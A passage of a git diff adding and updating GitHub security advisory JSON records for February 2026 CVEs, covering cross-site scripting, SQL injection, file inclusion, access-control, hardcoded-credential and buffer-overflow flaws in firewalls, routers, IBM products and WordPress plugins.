"url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L124" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wemail/tags/2.0.6/includes/Rest/Forms.php#L222" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3442404%40wemail%2Ftrunk&old=3423372%40wemail%2Ftrunk&sfp_email=&sfph_mail=#file1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/16dd90c3-3962-4c8e-993f-b6824c48ab76?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T10:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json b/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json new file mode 100644 index 0000000000000..d55dac1df64ce --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-whxx-5mgj-36jh/GHSA-whxx-5mgj-36jh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-whxx-5mgj-36jh", + "modified": "2026-02-19T15:30:34Z", + "published": "2026-02-19T15:30:34Z", + "aliases": [ + "CVE-2019-25417" + ], + "details": "Comodo Dome Firewall 2.7.0 contains a reflected cross-site scripting vulnerability that allows attackers to inject malicious scripts by submitting crafted input to the protocol parameter. Attackers can send POST requests to the QoS rules management endpoint with JavaScript payloads in the protocol parameter to execute arbitrary code in administrator browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25417" + }, + { + "type": "WEB", + "url": "https://cdome.comodo.com/firewall" + }, + { + "type": "WEB", + "url": "https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9278&af=9278" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46408" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/comodo-dome-firewall-reflected-cross-site-scripting-via-qos-rules" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T13:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json b/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json new file mode 100644 index 0000000000000..fae1a23991ed1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj34-3cm4-v64v/GHSA-wj34-3cm4-v64v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj34-3cm4-v64v", + "modified": "2026-02-19T00:30:29Z", + "published": "2026-02-19T00:30:29Z", + "aliases": [ + "CVE-2019-25396" + ], + "details": "IPFire 2.21 Core Update 127 contains a reflected cross-site scripting vulnerability in the updatexlrator.cgi script that allows attackers to inject malicious scripts through POST parameters. Attackers can submit crafted requests with script payloads in the MAX_DISK_USAGE or MAX_DOWNLOAD_RATE parameters to execute arbitrary JavaScript in users' browsers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25396" + }, + { + "type": "WEB", + "url": "https://downloads.ipfire.org/releases/ipfire-2.x/2.21-core127/ipfire-2.21.x86_64-full-core127.iso" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/46344" + }, + { + "type": "WEB", + "url": "https://www.ipfire.org" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/ipfire-core-update-reflected-xss-via-updatexlrator" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T22:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json new file mode 100644 index 0000000000000..e553b9435d6ab --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wj4m-c5pc-p9r9/GHSA-wj4m-c5pc-p9r9.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wj4m-c5pc-p9r9", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-33089" + ], + "details": "IBM Concert 1.0.0 through 2.1.0 could allow a remote attacker to obtain sensitive information or perform unauthorized actions due to the use of hard coded user credentials.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33089" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7260162" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json new file mode 100644 index 0000000000000..ab1ae0c19d6e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjf9-j9vw-27f4", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70064" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify system data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70064" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/c6f20cd6db1fbb1f0e7e199ead66691d" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json new file mode 100644 index 0000000000000..0c97c8eb879ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm24-gwfw-426w/GHSA-wm24-gwfw-426w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm24-gwfw-426w", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22373" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Fooddy fooddy allows PHP Local File Inclusion.This issue affects Fooddy: from n/a through <= 1.3.10.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22373" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/fooddy/vulnerability/wordpress-fooddy-theme-1-3-10-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json new file mode 100644 index 0000000000000..ce13f60bcb10d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm24-v2x8-m9pj/GHSA-wm24-v2x8-m9pj.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm24-v2x8-m9pj", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69410" + ], + "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Edge-Themes Belletrist belletrist allows PHP Local File Inclusion.This issue affects Belletrist: from n/a through <= 1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69410" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/belletrist/vulnerability/wordpress-belletrist-theme-1-2-local-file-inclusion-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-98" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json b/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json new file mode 100644 index 0000000000000..1e3967ca37956 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm72-rvv8-pj93/GHSA-wm72-rvv8-pj93.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm72-rvv8-pj93", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2026-23805" + ], + "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Yoren Chang Media Search Enhanced media-search-enhanced allows SQL Injection.This issue affects Media Search Enhanced: from n/a through <= 0.9.1.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23805" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/media-search-enhanced/vulnerability/wordpress-media-search-enhanced-plugin-0-9-1-sql-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json new file mode 100644 index 0000000000000..f8c52c623738e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wm8j-hgw9-h534/GHSA-wm8j-hgw9-h534.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wm8j-hgw9-h534", + "modified": "2026-02-17T21:31:14Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2025-27899" + ], + "details": "IBM DB2 Recovery Expert for LUW 5.5 Interim Fix 002 discloses sensitive information in an environment variable that could aid in further attacks against the system.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27899" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259901" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-526" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T20:22:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json b/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json new file mode 100644 index 0000000000000..cac46c27526f2 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmpp-2v6j-mq33/GHSA-wmpp-2v6j-mq33.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmpp-2v6j-mq33", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:55Z", + "aliases": [ + "CVE-2026-23617" + ], + "details": "GFI MailEssentials AI versions prior to 22.4 contain a stored cross-site scripting vulnerability in the Spam Keyword Checking (Body) conditions interface. An authenticated user can supply HTML/JavaScript in the ctl00$ContentPlaceHolder1$pvGeneral$TXB_Condition parameter to /MailEssentials/pages/MailSecurity/ASKeywordChecking.aspx, which is stored and later rendered in the management interface, allowing script execution in the context of a logged-in user.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23617" + }, + { + "type": "WEB", + "url": "https://gfi.ai/products-and-solutions/network-security-solutions/mailessentials/resources/documentation/product-releases" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gfi-mailessentials-ai-anti-spam-spam-keyword-checking-body-condition-stored-xss" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T18:24:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json new file mode 100644 index 0000000000000..39700aa88f517 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmq7-3p89-w6h8/GHSA-wmq7-3p89-w6h8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmq7-3p89-w6h8", + "modified": "2026-02-17T15:31:35Z", + "published": "2026-02-17T09:31:24Z", + "aliases": [ + "CVE-2026-0829" + ], + "details": "The Frontend File Manager Plugin WordPress plugin through 23.5 allows unauthenticated users to send emails through the site without any security checks. This lets attackers use the WordPress site as an open relay for spam or phishing emails to anyone. Attackers can also guess file IDs to access and share uploaded files without permission, exposing sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0829" + }, + { + "type": "WEB", + "url": "https://wpscan.com/vulnerability/57d62cea-cfb8-4421-a209-e64a015ad225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T07:16:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json b/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json new file mode 100644 index 0000000000000..88f1197fede2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wmwp-mm98-6v2w/GHSA-wmwp-mm98-6v2w.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wmwp-mm98-6v2w", + "modified": "2026-02-19T18:31:51Z", + "published": "2026-02-19T18:31:51Z", + "aliases": [ + "CVE-2025-41023" + ], + "details": "An authentication bypass vulnerability has been found in Thesamur's AutoGPT. This vulnerability allows an attacker to bypass authentication mechanisms. Once inside the web application, the attacker can use any of its features regardless of the authorisation method used.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-41023" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/authentication-bypass-autogpt-de-thesamur" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json index a0236b79690b7..34a5ea5e82e9e 100644 --- a/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json +++ b/advisories/unreviewed/2026/02/GHSA-wp4v-6rrv-wqv9/GHSA-wp4v-6rrv-wqv9.json @@ -29,7 +29,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-287" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json new file mode 100644 index 0000000000000..a6b73996ee3fd --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpf3-wv8v-2wxj/GHSA-wpf3-wv8v-2wxj.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpf3-wv8v-2wxj", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2025-12071" + ], + "details": "The Frontend User Notes plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.0 via the 'funp_ajax_modify_notes' AJAX endpoint due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify arbitrary notes that do not belong to them.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12071" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/frontend-user-notes/tags/2.1.1/includes/ajax.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/30f2dd33-228d-4942-88d9-78c7ed0b79a1?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:16Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json b/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json index 43a22929b9684..d9092449869dc 100644 --- a/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json +++ b/advisories/unreviewed/2026/02/GHSA-wpfv-crpp-p2xq/GHSA-wpfv-crpp-p2xq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-wpfv-crpp-p2xq", - "modified": "2026-02-02T09:30:30Z", + "modified": "2026-02-19T15:30:33Z", "published": "2026-02-02T09:30:30Z", "aliases": [ "CVE-2026-20711" diff --git a/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json b/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json new file mode 100644 index 0000000000000..8bd20e5c38e97 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpg4-2qjv-77p8/GHSA-wpg4-2qjv-77p8.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpg4-2qjv-77p8", + "modified": "2026-02-19T18:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25331" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP Activity Log wp-security-audit-log allows DOM-Based XSS.This issue affects WP Activity Log: from n/a through <= 5.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25331" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/wp-security-audit-log/vulnerability/wordpress-wp-activity-log-plugin-5-5-4-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json new file mode 100644 index 0000000000000..18e5ff273bdf6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpqj-9q8f-r6hc/GHSA-wpqj-9q8f-r6hc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpqj-9q8f-r6hc", + "modified": "2026-02-21T15:31:34Z", + "published": "2026-02-21T15:31:34Z", + "aliases": [ + "CVE-2026-2870" + ], + "details": "A security flaw has been discovered in Tenda A21 1.0.0.0. Affected by this issue is the function set_qosMib_list of the file /goform/formSetQosBand. The manipulation of the argument list results in stack-based buffer overflow. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2870" + }, + { + "type": "WEB", + "url": "https://github.com/QIU-DIE/cve-nneeww/issues/1" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347107" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754627" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T15:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json b/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json new file mode 100644 index 0000000000000..65483980066d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wpqj-w3wq-pqjv/GHSA-wpqj-w3wq-pqjv.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wpqj-w3wq-pqjv", + "modified": "2026-02-19T18:31:50Z", + "published": "2026-02-19T18:31:50Z", + "aliases": [ + "CVE-2026-0561" + ], + "details": "The Shield Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'message' parameter in all versions up to, and including, 21.0.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0561" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3439494%40wp-simple-firewall&new=3439494%40wp-simple-firewall&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://research.cleantalk.org/cve-2026-0561" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cb49eb5f-c1ff-4440-8b53-c2515e65da27?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json new file mode 100644 index 0000000000000..231ed8ee9fb52 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wprr-57fw-46wj/GHSA-wprr-57fw-46wj.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wprr-57fw-46wj", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2025-13689" + ], + "details": "IBM DataStage on Cloud Pak for Data could allow an authenticated user to execute arbitrary commands and gain access to sensitive information due to unrestricted file uploads.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13689" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7259958" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T23:16:18Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json new file mode 100644 index 0000000000000..9baadc5170937 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wq2g-h2h9-v8x3/GHSA-wq2g-h2h9-v8x3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wq2g-h2h9-v8x3", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-60038" + ], + "details": "A vulnerability has been identified in Rexroth IndraWorks. This 